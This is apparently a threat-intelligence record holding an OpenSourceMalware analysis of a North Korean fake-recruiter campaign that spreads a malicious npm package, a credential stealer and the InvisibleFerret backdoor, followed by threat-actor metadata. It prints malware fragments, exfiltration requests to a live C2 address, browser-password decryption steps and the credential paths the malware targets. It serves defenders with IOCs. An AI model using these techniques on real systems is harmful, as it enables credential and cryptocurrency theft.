{
	"id": "8afaa5c2-24eb-4b7b-a789-8392b63dfef5",
	"created_at": "2026-04-06T00:12:39.734631Z",
	"updated_at": "2026-04-10T03:38:19.39735Z",
	"deleted_at": null,
	"sha1_hash": "ab7b1e63fa4e254e947ff147cb5f4c8e312cb28e",
	"title": "Contagious Interview gets an upgrade for 2026 - A comprehensive analysis by OpenSourceMalware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2194614,
	"plain_text": "Contagious Interview gets an upgrade for 2026 - A comprehensive\r\nanalysis by OpenSourceMalware\r\nBy OpenSourceMalware.com\r\nPublished: 2026-11-20 · Archived: 2026-04-05 15:27:18 UTC\r\nSoftware engineers are still falling prey to fake recruiters who approach them\r\noffering high paying roles\r\n*By: 6mile Date: January 19, 2026\r\nIntroduction: The Package That Started It All\r\nIt started with what looked like an innocuous npm package: tailwindcss-forms-kit . The name seemed\r\nlegitimate enough—Tailwind CSS is a popular utility-first CSS framework, and a package offering pre-built form\r\ncomponents would be exactly the kind of developer productivity tool that gets installed without much scrutiny.\r\nBut this wasn't a helpful utility. It was the opening move in a sophisticated, multi-stage attack orchestrated by\r\nNorth Korean state-sponsored threat actors.\r\nOver the course of my investigation, I would trace this malicious package through three distinct stages of payload\r\ndelivery, each more sophisticated than the last. This is the story of that analysis—a technical narrative of how a\r\nsimple npm install can lead to complete system compromise, cryptocurrency theft, and persistent backdoor\r\naccess for one of the world's most prolific nation-state adversaries.\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 1 of 16\n\nOpenSourceMalware knows Lazarus Group well\r\nOur team has been tracking DPRK malware for years, and we've been researching and analyzing the \"Contagious\r\nInterview\" campaign since it started in 2023. We have written about DPRK campaigns before which you can read\r\nabout on our blog in December 2025, and November 2025. 
Additionally, we have written deep research on\r\nLazarus Group in our Intelligence library.\r\nAccording to OpenSourceMalware data, we are currently tracking 988 individual threats, and 4285 individual\r\nIOCs attributed to DPRK Lazarus group for \"Contagious Interview\". Of those threats, 405 of them are git\r\nrepositories and 373 of them are NPM packages. That's a lot of data.\r\nStage One: The Initial Infection Vector\r\nDiscovery and Context\r\nThe first stage came to my attention as part of the broader \"Contagious Interview\" campaign—a sustained\r\noperation targeting software developers, particularly those in the cryptocurrency, Web3, and blockchain sectors.\r\nThe attack methodology is insidious in its simplicity: threat actors impersonate recruiters on LinkedIn and other\r\njob platforms, approach developers with enticing opportunities, and during the \"interview process,\" ask candidates\r\nto download and run what appears to be a coding challenge or video conferencing software.\r\nThe tailwindcss-forms-kit package represents one delivery mechanism in this campaign. We are tracking\r\nmultiple distribution mechanisms for Contagious Interview including git repositories, NPM packages and PyPI\r\npackages. The sophistication isn't just in the malware itself—it's in the social engineering that convinces skilled\r\ndevelopers to execute it voluntarily.\r\nThe NPM package\r\nWhen we initially inspected the tailwindcss-forms-kit NPM package it looked innocuous enough:\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 2 of 16\n\nIt purports to be a library that automatically downloads Tailwind artefacts from Cloudflare, Fastly and other\r\nCDNs. Threat actors like Lazarus love packages like this one because the package requires connecting to CDNs\r\nand other HTTP resources. 
That means it wouldn't look unusual when the package makes outbound connections to\r\ndownload stuff.\r\nThe NPM author, intelliverse, has just one package:\r\nTechnical Analysis: JavaScript Obfuscation and the Main Payload\r\nNormally, with DPRK packages you have to find, and then deobfuscate, complex JavaScript to find the malicious\r\ncode, but in this case it was right out in the open in the index.js file. There was no pre- or post-install script in the\r\npackage.json manifest, which means that the threat actors intended this library to get imported and their payload\r\nexecuted that way.\r\nThe index.js file used curl to pull data from https://api[.]npoint[.]io/9d94ec6053e75dbd933e which was a heavily\r\nobfuscated JavaScript file. The obfuscation technique was sophisticated: an 870-element string array containing all\r\nthe malware's strings, referenced through hexadecimal offsets via a lookup function. Every variable name was\r\nmangled with hex prefixes like _0x2d622a , and the initialization code included a self-modifying loop that\r\nshuffled the string array based on mathematical calculations to defeat static analysis.\r\n// Obfuscated lookup pattern observed\r\nfunction _0x1c18(_0xce1eb9, _0x49ac6a) {\r\n const _0xa6dadc = _0xa6da();\r\n return _0x1c18 = function(_0x1c1851, _0x4b3a72) {\r\n _0x1c1851 = _0x1c1851 - 0x19e;\r\n let _0x9b7ba6 = _0xa6dadc[_0x1c1851];\r\n return _0x9b7ba6;\r\n }, _0x1c18(_0xce1eb9, _0x49ac6a);\r\n}\r\nI searched OpenSourceMalware for [https://api[.]npoint[.]io/9d94ec6053e75dbd933e]\r\n(https://opensourcemalware.com/?search=https%3A%2F%2Fapi.npoint.io%2F9d94ec6053e75dbd933e) but it\r\nwasn't being used for any other threat campaigns. 
However, the npoint.io JSON storage service is very popular\r\nwith DPRK threat actors and there are over a dozen examples in the OSM database just from the last two months.\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 4 of 16\n\nStage Two: Hybrid JavaScript Malware\nDeobfuscating the initial JavaScript payload\nWhen I analyzed the JavaScript payload, I expected either Beavertail or OtterCookie. What I found was a hybrid\nof the two, plus some new stuff. However, I think this is still easily attributable to Lazarus Group, a North Korean\nstate-sponsored APT organization as there were many technical indicators that showed that this was a new,\nupdated DPRK \"Contagious Interview\" campaign. For example:\nAfter spending an hour working with my Claude workflow I was successfully mapping hex offsets to actual\nstrings and reconstructing the control flow, I uncovered the malware's core mission. This wasn't just any\ninformation stealer—it was a multi-platform credential harvester and Remote Access Trojan designed with\nsurgical precision.\nCapabilities: Deconstructing the JavaScript Malware\nThe primary objectives of this second-stage payload were reconnaissance, credential theft, and most importantly,\ndownloading the second stage. Here's what I found it capable of:\nCommand \u0026 Control Infrastructure:\nPrimary C2 server: 95.216[.]37[.]186:5000\nReal-time bidirectional communication via Socket.IO\nWebSocket connections to /client endpoint\nMultiple HTTP endpoints for registration, file upload, and secondary payload downloads\nBrowser Credential Theft: The malware targeted five major browsers—Chrome, Brave, Opera, Yandex, and\nMicrosoft Edge on Windows. But this wasn't simple database copying. On Windows, it implemented full DPAPI\n(Data Protection API) decryption to extract plaintext passwords:\n1. Read the browser's Local State file to extract the encrypted encryption key\n2. 
Remove the \"DPAPI\" prefix from the base64-decoded key\n3. Use Windows DPAPI ( @primno/dpapi npm package) to decrypt the master key\n4. Copy the browser's Login Data SQLite database to avoid file locks\n5. Query passwords from the database\n6. Decrypt each password using AES-256-GCM with the master key\n7. Export as plaintext to passwords_.txt\nOn macOS, it took a different approach: stealing the entire login.keychain-db file along with browser databases\nand bash history files. On Linux, it grabbed browser databases and shell history. It was opportunistic but at the\nsame time knew what to grab, when.\nCryptocurrency Wallet Targeting: This is where the financial motivation became crystal clear. The malware had\nhardcoded extension IDs for seven cryptocurrency wallet browser extensions:\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\nPage 5 of 16\n\nconst CRYPTO_EXTENSIONS = [\r\n 'nkbihfbeogaeaoehlefnkodbefgpgknn', // MetaMask\r\n 'bfnaelmomeimhlpmgjnjophhpkkoljpa', // Phantom\r\n 'ibnejdfjmmkpcnlpebklmnkoeoihofec', // Coinbase Wallet\r\n 'ejbalbakoplchlghecdalmeeeajnimhm', // MetaMask (alternate)\r\n 'egjidjbpglichdcondbcbdnbeeppgdph', // Trust Wallet\r\n 'acmacodkjbdgmoleebolmdjonilkdbch', // Bitkeep\r\n 'khpkpbbcccdmmclmpigdgddabeilkdpd' // Guarda\r\n];\r\nIt didn't stop at browser extensions. Desktop wallet applications were equally targeted—Exodus, Electrum,\r\nAtomic Wallet, and Guarda. 
The malware would locate their installation directories, enumerate LevelDB database\r\nfiles, and upload everything to the C2 server.\r\nCloud Credentials: Perhaps most concerning for organizations, the malware automatically uploaded three critical\r\ndirectories on connection:\r\n~/.aws — Amazon Web Services credentials\r\n~/.azure — Microsoft Azure credentials\r\n~/.config/gcloud — Google Cloud credentials\r\nThis meant that any developer with cloud infrastructure access who executed this package had just handed the\r\nkeys to potentially millions of dollars worth of cloud resources to a nation-state adversary.\r\nSensitive File Exfiltration: The malware implemented recursive directory scanning with intelligent filtering. It\r\nsearched for files containing:\r\n.env — Environment variable files (API keys, database passwords)\r\n.json — Configuration files\r\nseed — Cryptocurrency seed phrases\r\nphantom , metamask — Wallet-related files\r\nIt was smart enough to exclude massive directories like node_modules , .cargo , .npm , and .git to speed up\r\nsearching and reduce noise. On Windows, it would scan not just the C: drive but also D: through Z:, looking for\r\nexternally mounted drives or network shares.\r\nRemote Access Capabilities: The Socket.IO connection wasn't just for exfiltration—it provided real-time remote\r\naccess. 
The malware registered handlers for commands including:\r\nenv — Search for sensitive files across the entire system\r\nimp — Search for \"important\" files (same as env)\r\npat \u003cpattern\u003e — Search for files matching a specific pattern\r\nupload — Execute full credential harvesting operation\r\nexec — Execute arbitrary shell commands\r\ndir — Browse directory contents\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 6 of 16\n\nread_file — Read and return file contents\r\nss_upf \u003cfile\u003e — Upload a single file\r\nss_upd \u003cdirectory\u003e — Upload an entire directory\r\nThe exec command was particularly powerful. It gave the threat actors a full remote shell with special handling\r\nfor cleanup commands and the ability to run anything via child_process.exec() .\r\nPersistence Mechanisms\r\nThe malware wasn't content with a one-time data grab. On Windows, it established persistence via the registry:\r\nRegistry Path: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegistry Key: NvidiaDriverUpdate\r\nThe naming was deliberately deceptive—\"NvidiaDriverUpdate\" mimics legitimate NVIDIA graphics driver\r\nupdate processes that users are accustomed to seeing.\r\nIt also implemented process resurrection: when terminated with SIGINT (Ctrl+C), it would fork a detached child\r\nprocess running server.js before exiting. The new process would continue running independently, providing\r\nresilience against manual termination attempts.\r\nWhat is this malware?\r\nThis wasn't classic Beavertail, and it wasn't OtterCookie. But, what was it? 
It was clearly a DPRK campaign, as\r\nhad many traits from both malware strains:\r\nSame wallet extensions were targeted\r\nSame exfiltration targets (browser creds, wallet files, macOS keychain, etc)\r\nSame C2 infrastructure (Vercel and npoint)\r\nSame libraries (better-sqlite3, @primno/dpapi, socket.io)\r\nBut this new malware had some new changes:\r\nIt used Nvidia names for its Windows registry keys instead of the typical Node.js keys\r\nThis new version looks for cloud credentials from AWS, Azure and Google Cloud\r\nWe're calling it \"CloudBeaverCookie\". Yes, we know that's ridiculous, but we don't care.\r\nStage Three: InvisibleFerret Revealed\r\nThe Second-Stage Download\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 7 of 16\n\nSo the second stage loader was interesting unto itself, but the most critical function of this stage was downloading\r\nand executing the final payload. The malware made an HTTP GET request to:\r\nURL: http://95.216[.]37[.]186:5000/download-app\r\nHeaders:\r\n X-Client-OS: \u003cwin32|linux|darwin\u003e\r\n X-Client-Arch: \u003cx64|x86|arm64\u003e\r\nBased on the operating system and architecture, it would download a platform-specific executable:\r\nWindows: %TEMP%\\app.exe\r\nLinux: /tmp/app\r\nmacOS: /var/folders/.../app\r\nThe execution was carefully designed for stealth. 
On Windows:\r\nspawn(OUTPUT_PATH, [], {\r\n detached: true,\r\n stdio: 'ignore',\r\n windowsHide: true, // CRITICAL: No console window\r\n shell: false\r\n});\r\nThe PyInstaller-Compiled Backdoor\r\nLinux Binary: third.stage.payload\r\n- Type: ELF 64-bit LSB executable, x86-64\r\n- Size: 8.4 MB (8,806,400 bytes)\r\n- SHA256: 699cd6c292b8a5933dabee63c74a9a3069ed6432c3433ab945ab46fe816d9e2c\r\nWindows Binary: third.stage.exe\r\n- Type: PE32+ executable (GUI) x86-64\r\n- Size: 8.1 MB (8,493,056 bytes)\r\n- SHA256: 1c8c1a693209c310e9089eb2d5713dc00e8d19f335bde34c68f6e30bccfbe781\r\nThe near-identical file sizes across different platforms immediately suggested these were packaged versions of the\r\nsame codebase. At 8+ MB, they were far too large to be simple native executables—something was embedded.\r\nOn Linux, it used nohup to ensure the process survived terminal disconnection. On macOS, it simply launched\r\ndetached with no console output.\r\nThe timing was interesting too: Windows execution happened 500ms after download completion, while Linux and\r\nmacOS executed after only 100ms. This staggered timing might be a rudimentary anti-sandboxing technique or\r\nsimply operational preference.\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 8 of 16\n\nClient Identification\r\nEach infected machine reported to the C2 with a unique identifier:\r\nClient ID: 0x338 (824 in decimal)\r\nHostname: \u003cos.hostname\u003e:\u003cmachineId_first_6_chars\u003e\r\nThe client ID 0x338 appears to be a campaign or variant identifier. If the hostname was empty, the malware fell\r\nback to the username from os.userInfo().username . 
This fingerprinting allowed the threat actors to track and\r\nmanage compromised systems.\r\nExfiltration Protocol\r\nData was sent to the C2 server through multiple methods:\r\nMethod 1: Multipart Form Upload\r\nPOST http://95.216[.]37[.]186:5000/file-upload\r\nContent-Type: multipart/form-data\r\nFields:\r\n - username: \u003cvictim-id\u003e\r\n - folderName: \u003ccategory\u003e\r\n - fileName: \u003cfilename\u003e\r\n - filePath: \u003coriginal-path\u003e\r\n - file: \u003cbinary-data\u003e\r\n - client_id: 0x338\r\n - isUpload: true\r\nMethod 2: JSON Content Upload (for text files)\r\nPOST http://95.216[.]37[.]186:5000/content-upload\r\nContent-Type: application/json\r\n{\r\n \"username\": \"\u003cvictim-id\u003e\",\r\n \"folderName\": \"\u003ccategory\u003e\",\r\n \"fileName\": \"\u003cfilename\u003e\",\r\n \"fileContent\": \"\u003ctext-content\u003e\",\r\n \"client_id\": 0x338\r\n}\r\nMethod 3: Secondary Server (for full file system exfiltration)\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 9 of 16\n\nPOST http://95.216[.]37[.]186:3011/file-upload\r\nHeaders:\r\n X-Machine-ID: \u003cmachine-id\u003e\r\n X-File-Path: \u003coriginal-path\u003e\r\n X-File-Size: \u003cbytes\u003e\r\n X-Upload-ID: \u003cunique-id\u003e\r\nBody: \u003cbinary-stream\u003e\r\nThe secondary server on port 3011 was particularly interesting. It implemented a sophisticated upload protocol\r\nwith duplicate detection (checking if files already exist via HTTP HEAD requests to /check ), cleanup on failure\r\n(notifying the server via /cleanup endpoint), and 30-second timeouts per file.\r\nWeb Console is Public\r\nMy favourite part of the hunt is when I find the bad guys infrastructure has been left on the public internet. Sure\r\nenough, the web console for the C2 servers is available at http://95.216[.]37[.]186:3000. 
When a compromised\r\nhost checks into the C2, it will show up here as a compromised asset, and ostensibly the threat actors can control it\r\nfrom here.\r\nIt feels like this public exposure of campaign infrastructure is becoming more common. This is the second time\r\nthis week that I've found the web console for a live threat campaign. This is happening more frequently for a few\r\nreasons: first, DPRK threat actors are managing a lot of infrastructure assets, and sometimes they probably just\r\nforget. Iterating through all the GitHub, Vercel, Npoint and other infrastructure is a lot of stuff to manage.\r\nBut what's even worse, I think, is that these threat actors just don't care. A few years ago, they would never have\r\nleft one of these consoles exposed, but now they don't care about cleaning up after themselves. They have so many\r\nmore that even if this gets taken down, they have other services to replace it.\r\nWe haven't had time to test this web console yet, but if we do we'll circle back to this blog post and update it.\r\nPyInstaller Discovery\r\nString analysis revealed the truth: these were PyInstaller-compiled Python applications. PyInstaller is a legitimate\r\ntool that bundles Python scripts with the Python interpreter and all dependencies into a single executable. It's\r\npopular among malware authors because:\r\n1. It eliminates the Python installation requirement on target systems\r\n2. It complicates static analysis by embedding compiled bytecode\r\n3. It enables cross-platform distribution from a single Python codebase\r\n4. 
It provides a layer of obfuscation via encrypted PYZ archives\r\nI found dozens of PyInstaller-specific strings:\r\nCould not load PyInstaller's embedded PKG archive from the executable\r\nPYINSTALLER_SUPPRESS_SPLASH_SCREEN\r\nPYINSTALLER_STRICT_UNPACK_MODE\r\nPYINSTALLER_RESET_ENVIRONMENT\r\npyi-bootloader-ignore-signals\r\nPYZ archive entry not found in the TOC!\r\nThe PYINSTALLER_SUPPRESS_SPLASH_SCREEN variable indicated the malware was configured for stealth mode,\r\npreventing any visual indicators during execution. The PYINSTALLER_RESET_ENVIRONMENT variable suggested\r\nenvironment variable clearing to avoid detection based on environmental fingerprinting.\r\nEmbedded Python 3.10 Runtime\r\nFurther analysis revealed the exact Python version: 3.10. The binaries contained a complete Python 3.10\r\ninterpreter with all standard libraries and compiled extension modules:\r\nlibpython3.10.so.1.0 (Linux)\r\nFailed to set python home path!\r\nFailed to pre-initialize embedded python interpreter!\r\nPyConfig\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 11 of 16\n\nPy_InitializeFromConfig\r\npython3.10/lib-dynload/_asyncio.cpython-310-x86_64-linux-gnu.so\r\n\u003cinsert sandbox data here\u003e\r\nInvisibleFerret Capabilities in Detail\r\nBased on the embedded libraries and MITRE documentation, InvisibleFerret provides:\r\nSystem Reconnaissance:\r\nOS identification, version, architecture\r\nNetwork configuration and IP geolocation (http://ip-api.com/json)\r\nUser enumeration and privilege assessment\r\nProcess discovery to identify security tools and target applications\r\nCredential Harvesting:\r\nBrowser credentials with platform-specific decryption (DPAPI on Windows, Keychain on macOS)\r\nCryptocurrency wallet extensions (MetaMask, Phantom, Trust Wallet, etc.)\r\nDesktop wallet applications (Exodus, Atomic, Electrum)\r\nPassword managers (1Password, LastPass, Bitwarden)\r\nSSH keys ( ~/.ssh/ )\r\nCloud credentials ( ~/.aws/ , 
~/.azure/ , ~/.config/gcloud )\r\nEnvironment files ( .env ) containing API keys and secrets\r\nPersistent Surveillance:\r\nSystem-wide keylogging (captures passwords as typed)\r\nClipboard monitoring (can replace cryptocurrency addresses in real-time)\r\nFile system monitoring (immediate exfiltration of new wallet files, SSH keys)\r\nRemote Access:\r\nArbitrary command execution via subprocess\r\nDynamic Python code execution via ast module\r\nAnyDesk deployment for GUI-based remote desktop\r\nFile upload/download with tar/zip packaging\r\nData Exfiltration:\r\nHTTP/HTTPS uploads to /Uploads endpoint\r\nFTP transmission\r\nTelegram Bot API (traffic blends with legitimate Telegram usage)\r\nSocket.IO tunneling through primary C2 channel\r\nPersistence:\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 12 of 16\n\nWindows: Batch files in Startup folder (e.g., queue.bat )\r\nLinux: .desktop files in ~/.config/autostart/\r\nmacOS: LaunchAgent plists in ~/Library/LaunchAgents/\r\nWith all three stages analyzed, I could now map the complete infection sequence:\r\n┌───────────────────────────────────────────────────────\r\n│ STAGE 1: Social Engineering \u0026 Initial Infection │\r\n│ ───────────────────────────────────────────────────────\r\n│ • Fake recruiter contacts developer on LinkedIn │\r\n│ • Multi-round interview process builds trust │\r\n│ • \"Coding challenge\" delivered as npm package │\r\n│ • Developer runs: npm install tailwindcss-forms-kit │\r\n│ • Malicious install script executes obfuscated JavaScript │\r\n└────────────────────────┬──────────────────────────────\r\n │\r\n ▼\r\n┌───────────────────────────────────────────────────────\r\n│ STAGE 2: OtterCookie Deployment \u0026 Credential Theft │\r\n│ ───────────────────────────────────────────────────────\r\n│ • Connects to C2: 95.216.37.186:5000 (Socket.IO) │\r\n│ • Registers with Client ID: 0x338 │\r\n│ • Auto-uploads: ~/.aws, ~/.azure, ~/.config/gcloud │\r\n│ • Downloads 
stage 3: /download-app (OS-specific binary) │\r\n│ • On command: steals browser passwords (DPAPI decryption) │\r\n│ • On command: steals crypto wallets (7 extensions, 4 apps) │\r\n│ • On command: searches for .env files, seed phrases │\r\n│ • Establishes persistence: NvidiaDriverUpdate registry key │\r\n│ • Maintains remote shell access via Socket.IO │\r\n└────────────────────────┬──────────────────────────────\r\n │\r\n ▼\r\n┌───────────────────────────────────────────────────────\r\n│ STAGE 3: InvisibleFerret Backdoor \u0026 Long-Term Access │\r\n│ ───────────────────────────────────────────────────────\r\n│ • PyInstaller-compiled Python 3.10 backdoor (8+ MB) │\r\n│ • Embedded libraries: Socket.IO, Tornado, evdev, crypto │\r\n│ • System-wide keylogging (evdev on Linux, pyWinhook Windows) │\r\n│ • Clipboard monitoring (crypto address replacement) │\r\n│ • Additional credential theft targeting │\r\n│ • AnyDesk deployment for GUI remote access │\r\n│ • Multi-channel exfiltration: HTTP, FTP, Telegram API │\r\n│ • Persistent surveillance and data collection │\r\n│ • Awaits tasking from DPRK operators │\r\n└───────────────────────────────────────────────────────\r\nThe Complete Attack Chain\r\nThe OSM team has been focused on generating attack graphs for software supply chain attacks in a new,\r\ninnovative way: we extract indicators of compromise from the different supply chain attack components and then\r\nmap these components to their related dependencies. 
This allows you to see the bigger picture: how supply\r\nchain components like git repos, NPM packages, JSON storage services, and C2 infrastructure map across other\r\nDPRK campaigns.\r\nIn this case you can see how multiple malicious GitHub repositories associated with the DPRK \"contagious\r\ninterview\" campaign use the same type of JSON storage service from npoint.io:\r\nIndicators of Compromise (IOCs)\r\nFile Hashes\r\nStage 3 Linux:\r\nMD5: 5a2c042b086a475dca4c7dcec62693c1\r\nSHA256: 699cd6c292b8a5933dabee63c74a9a3069ed6432c3433ab945ab46fe816d9e2c\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 14 of 16\n\nSize: 8,806,400 bytes\r\nAny.run analysis: https://app.any.run/tasks/33c0a1a2-43a5-4812-8305-77adb7607ec3\r\nStage 3 Windows:\r\nMD5: 153e2f27e035252d5f7ace69948e80b2\r\nSHA256: 1c8c1a693209c310e9089eb2d5713dc00e8d19f335bde34c68f6e30bccfbe781\r\nSize: 8,493,056 bytes\r\nAny.run analysis: https://app.any.run/tasks/71e42942-dd10-44ad-a949-4feced5a0f41\r\nNetwork IOCs\r\nC2 Infrastructure:\r\n95.216.37.186:5000 (primary C2)\r\n95.216.37.186:3011 (secondary exfiltration)\r\n95.164.17.24:1224 (documented InvisibleFerret C2)\r\nHost-Based IOCs\r\nRegistry Keys (Windows):\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\NvidiaDriverUpdate\r\nFile Paths:\r\n%TEMP%\\app.exe (Windows)\r\n/tmp/app (Linux)\r\n~/.config/autostart/*.desktop (Linux persistence)\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\queue.bat (Windows)\r\n~/Library/LaunchAgents/com.avatar.update.wake.plist (macOS)\r\nTargeted Paths:\r\n~/.ssh/* (SSH keys)\r\n~/.aws/credentials (AWS)\r\n~/.azure/* (Azure)\r\n~/.config/gcloud/* (GCP)\r\n**/.env (environment files)\r\nChrome/Brave/Opera/Edge/Yandex User Data directories\r\nReferences\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 15 of 16\n\n1. MITRE ATT\u0026CK S1245 - InvisibleFerret: https://attack.mitre.org/software/S1245/\r\n2. 
MITRE ATT\u0026CK G1052 - Contagious Interview: https://attack.mitre.org/groups/G1052/\r\n3. Palo Alto Networks Unit 42 (October 2024): \"Contagious Interview: DPRK Threat Actors Lure Tech\r\nIndustry Job Seekers\"\r\n4. GitLab Security (September 2025): \"BeaverTail variant distributed via malicious repositories\"\r\n5. Socket.dev: \"North Korea's Contagious Interview Supply Chain Attack\"\r\n6. ANY.RUN: \"InvisibleFerret and OtterCookie Technical Analysis\"\r\n7. Malpedia: py.invisibleferret, js.beavertail\r\nThis analysis was conducted in an isolated environment without executing malware. All findings are based on\r\nstatic analysis, string extraction, and correlation with published threat intelligence. Stay vigilant, verify recruiter\r\nidentities, and never execute untrusted code—even during job interviews.\r\nSource: https://opensourcemalware.com/blog/contagious-interview-comprehensive",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://opensourcemalware.com/blog/contagious-interview-comprehensive"
	],
	"report_names": [
		"contagious-interview-comprehensive"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
